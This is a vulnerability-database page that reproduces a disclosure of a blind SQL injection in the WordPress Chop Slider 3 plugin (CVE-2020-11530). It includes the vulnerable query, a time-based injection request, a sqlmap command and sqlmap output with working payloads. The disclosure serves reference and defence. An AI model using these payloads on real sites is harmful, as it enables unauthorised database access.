Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress ChopSlider3 3.4 SQL Injection

🗓️ 12 May 2020 00:00:00Reported by SunCSRType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 165 Views

WordPress ChopSlider3 3.4 SQL Injection CVE-2020-1153

Related
Code
ReporterTitlePublishedViews
Family
0day.today		WordPress ChopSlider 3 SQL Injection Vulnerability
9 May 202000:00
zdt
ATTACKERKB		CVE-2020-11530
8 May 202000:00
attackerkb
Circl		CVE-2020-11530
18 Feb 202111:04
circl
CNVD		WordPress Chop Slider SQL Injection Vulnerability
11 May 202000:00
cnvd
Check Point Advisories		SQL Injection Over HTTP Traffic (CVE-2020-11530; CVE-2020-17463; CVE-2020-17506; CVE-2020-25990; CVE-2020-27481; CVE-2020-5766; CVE-2020-8655; CVE-2020-8656; CVE-2020-9465)
18 Nov 202000:00
checkpoint_advisories
CVE		CVE-2020-11530
8 May 202019:10
cve
Cvelist		CVE-2020-11530
8 May 202019:10
cvelist
Dsquare		WordPress Chop Slider 3 SQL Injection
5 Jun 202000:00
dsquare
Metasploit		WordPress ChopSlider3 id SQLi Scanner
18 Feb 202117:42
metasploit
Nuclei		WordPress Chop Slider 3 - Blind SQL Injection
16 Jun 202607:13
nuclei
Rows per page
`# Exploit Title: ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection  
# Exploit Author: SunCSR (Sun* Cyber Security Research)  
# Google Dork: N/A  
# Date: 2020-05 -12  
# Vendor Homepage: https://idangero.us/  
# Software Link: https://github.com/idangerous/Plugins  
# Version: <= 3.4  
# Tested on: Ubuntu 18.04  
# CVE: 2020-11530  
  
Description:  
A blind SQL injection vulnerability is present in Chop Slider 3  
'/wp-content/plugins/chopslider/get_script/index.php':  
$cs_result = $wpdb->get_row('SELECT * FROM ' . CHOPSLIDER_TABLE_NAME . '  
WHERE chopslider_id =' . $id);  
  
PoC:  
Blind SQL injection:  
GET /wp-content/plugins/chopslider/get_script/index.php?id=1111111 or  
(SELECT sleep(10))=6868  
SQLMap using:  
sqlmap -u '  
http://localhost/wp-content/plugins/chopslider/get_script/index.php?id=1111111111'  
--level=5 --risk=3  
sqlmap identified the following injection point(s) with a total of 17611  
HTTP(s) requests:  
---  
Parameter: id (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause  
Payload: id=-3097 OR 2236=2236  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 OR time-based blind  
Payload: id=1111111111 OR SLEEP(5)  
---  
[08:55:01] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Ubuntu  
web application technology: Apache 2.4.29  
back-end DBMS: MySQL >= 5.0.12  
  
I am looking forward to you accepting and approving my PoC.  
  
Thankyou!  
  
Vu Tien Hoa  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 May 2020 00:00Current
9.6High risk
Vulners AI Score9.6
EPSS0.95657
wordpresschop slider 3sql injectionvulnerabilitycve-2020-11530security advisorypoc
165